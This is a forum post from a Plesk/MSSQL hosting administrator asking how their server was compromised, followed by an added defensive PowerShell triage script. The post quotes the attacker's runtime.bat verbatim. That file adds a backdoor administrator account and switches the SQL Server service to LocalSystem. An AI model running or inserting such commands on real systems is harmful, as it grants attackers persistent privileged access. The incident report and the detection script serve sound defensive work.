In my Windows server with Plesk Obsidian and MSSQL 2019
I feel like I've been attacked by malware. There are two files in C:\ProgramData\Application\Windows. One file, named runtime.bat, has the following content:
Code:
net user PleskDeploy 123_Hoho /add & net localgroup administrators PleskDeploy /add
sc.exe config MSSQLSERVER obj= LocalSystem password= ""
sc stop MSSQLServer
sc start MSSQLServer
This is a hosting server.
The hacker enters the server through a bug in a website.
Transfers an executable file to C:\ProgramData\
With administrator access, runs this file and uses the server for crypto mining.
In addition, a process called SERVICES.EXE uses all of the server's memory. A user named PleskAdmin$ is created on the server with administrator access and is automatically deleted. Plesk is installed on this server. The Event Log also records a login with the username PleskAdmin$, and then its logs are deleted.
Server and Plesk are completely up to date.
No other software is installed on the server.
No such problem has been reported so far.
Now the questions are:
How does the file get transferred to the C:\ProgramData\ folder?
How does the attacker get administrator access to this folder and run the file?
This problem only occurs on Plesk servers; WebsitePanel servers are without problems.
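The following triage script is an added example and is not part of the original post or of Plesk or Microsoft's own tooling. It checks, on the affected host, the indicators the post describes: files dropped in C:\ProgramData\Application\Windows, the account names PleskDeploy and PleskAdmin$ and their Administrators membership, whether the MSSQLSERVER service has been switched to LocalSystem (as runtime.bat does), any services.exe running from outside System32, and the Security log events for account creation (4720), group membership change (4732), account deletion (4726) and audit log clearing (1102). The directory path, account names and service name are taken from the post; the seven-day lookback window is an assumption. Run it from an elevated PowerShell session.

```powershell
# Added triage script (not from the original post). Checks the indicators the
# post describes on a Windows / Plesk / MSSQL host. Requires an elevated session.

$dropDir      = 'C:\ProgramData\Application\Windows'   # drop directory named in the post
$suspectUsers = @('PleskDeploy', 'PleskAdmin$')        # names from runtime.bat and the event log
$svcName      = 'MSSQLSERVER'                          # service reconfigured by runtime.bat
$lookbackDays = 7                                      # assumption: how far back to search the logs
$userPattern  = 'PleskDeploy|PleskAdmin\$'             # regex form of $suspectUsers for log matching

# 1. Dropped files: path, size, timestamps and SHA-256 so each can be preserved and looked up.
Write-Host "== Files under $dropDir =="
if (Test-Path -LiteralPath $dropDir) {
    Get-ChildItem -LiteralPath $dropDir -Force -Recurse -File |
        Select-Object FullName, Length, CreationTimeUtc, LastWriteTimeUtc,
            @{ n = 'SHA256'; e = { (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash } } |
        Format-List
} else {
    Write-Host "Directory not present (it may have been cleaned up; check backups / shadow copies)."
}

# 2. Local accounts: do the names from the post exist, and who is in Administrators right now?
Write-Host "== Suspect local accounts =="
foreach ($u in $suspectUsers) {
    $acct = Get-LocalUser -Name $u -ErrorAction SilentlyContinue
    if ($acct) {
        Write-Warning "Account '$u' exists (Enabled=$($acct.Enabled), PasswordLastSet=$($acct.PasswordLastSet))"
    } else {
        Write-Host "Account '$u' not present (the post says it is created and deleted again; see event log below)."
    }
}
Write-Host "== Current members of Administrators =="
Get-LocalGroupMember -Group 'Administrators' | Select-Object Name, ObjectClass, PrincipalSource | Format-Table -AutoSize

# 3. SQL Server service identity: runtime.bat sets it to LocalSystem with an empty password.
Write-Host "== $svcName service account =="
$svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='$svcName'"
if ($svc) {
    Write-Host "$svcName runs as '$($svc.StartName)' (State=$($svc.State), StartMode=$($svc.StartMode))"
    if ($svc.StartName -eq 'LocalSystem') {
        Write-Warning "$svcName runs as LocalSystem; a default install uses a virtual or managed service account."
    }
} else {
    Write-Host "Service $svcName not found."
}

# 4. Impostor services.exe: the genuine one lives in System32 and runs as SYSTEM; anything else is suspect.
Write-Host "== services.exe instances =="
Get-Process -Name 'services' -ErrorAction SilentlyContinue |
    Select-Object Id, Path, WorkingSet64, StartTime |
    ForEach-Object {
        if ($_.Path -and $_.Path -ne "$env:SystemRoot\System32\services.exe") {
            Write-Warning "services.exe running from unexpected path: $($_.Path) (PID $($_.Id))"
        }
        $_
    } | Format-Table -AutoSize

# 5. Security log: account lifecycle events mentioning the suspect names, plus any audit-log clearing.
Write-Host "== Security events (last $lookbackDays days) =="
$filter = @{
    LogName   = 'Security'
    Id        = 4720, 4732, 4726, 1102, 4624   # create user, add to local group, delete user, log cleared, logon
    StartTime = (Get-Date).AddDays(-$lookbackDays)
}
Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
    Where-Object { $_.Id -eq 1102 -or $_.Message -match $userPattern } |
    Select-Object TimeCreated, Id,
        @{ n = 'Summary'; e = { ($_.Message -split "`r?`n")[0] } } |
    Format-Table -AutoSize
```

Note that if event 1102 is the only hit and the 4720/4726 events are missing, the log was cleared after the account was used, as the post describes; in that case the surviving evidence is the file hashes, the service configuration and any Plesk or web-server access logs from the same time window, which this script does not touch.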